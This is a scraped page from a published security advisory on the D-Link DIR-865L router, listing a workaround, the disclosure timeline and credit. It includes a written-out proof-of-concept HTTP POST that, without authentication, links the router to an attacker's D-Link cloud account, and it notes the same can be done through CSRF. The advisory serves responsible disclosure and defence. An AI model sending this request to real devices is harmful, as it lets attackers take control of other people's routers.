ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
♦ Additional information for vendors regarding immediate and long term fixes for<br />
these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors<br />
Solution<br />
♦ There currently is not a solution to this problem.<br />
♦ As a workaround, restrict access to WAN services.<br />
Proof of Concept Exploit<br />
The following HTTP POST will link the affected DIR-865L router to a D-Link cloud<br />
account. This attack could also be carried out via CSRF if the attacker does not have<br />
access to the web management interface.<br />
D-Link Cloud Account Linking<br />
* Make unauthenticated request to the router<br />
POST /register_send.php HTTP/1.1 <br />
Host: 192.168.0.1 <br />
User-‐Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 <br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <br />
Accept-‐Language: en-‐US,en;q=0.5 <br />
Accept-‐Encoding: gzip, deflate <br />
Content-‐Type: application/x-‐www-‐form-‐urlencoded; charset=UTF-‐8 <br />
Content-‐Length: 91 <br />
DNT: 1 <br />
Connection: keep-‐alive <br />
Pragma: no-‐cache <br />
Cache-‐Control: no-‐cache <br />
act=signin&lang=en&outemail=ACCOUNT_HERE&passwd=ACCOUNT_PASSWORD&mydlink_cookie=<br />
Disclosure Timeline<br />
♦ 3/2013 - Notified D-Link. No response.<br />
♦ 4/3/2013 - Notified D-Link requesting a follow up.<br />
♦ 7/26/2013 - Public Disclosure<br />
References<br />
♦ Advisory/Video: http://infosec42.blogspot.com<br />
♦ http://securityevaluators.com/content/case-studies/<br />
Credit<br />
♦ Discovered By: Jacob Holcomb – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong><br />
Evaluators<br />
♦ Exploited By: Jacob Holcomb – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong><br />
Evaluators<br />
<br />
63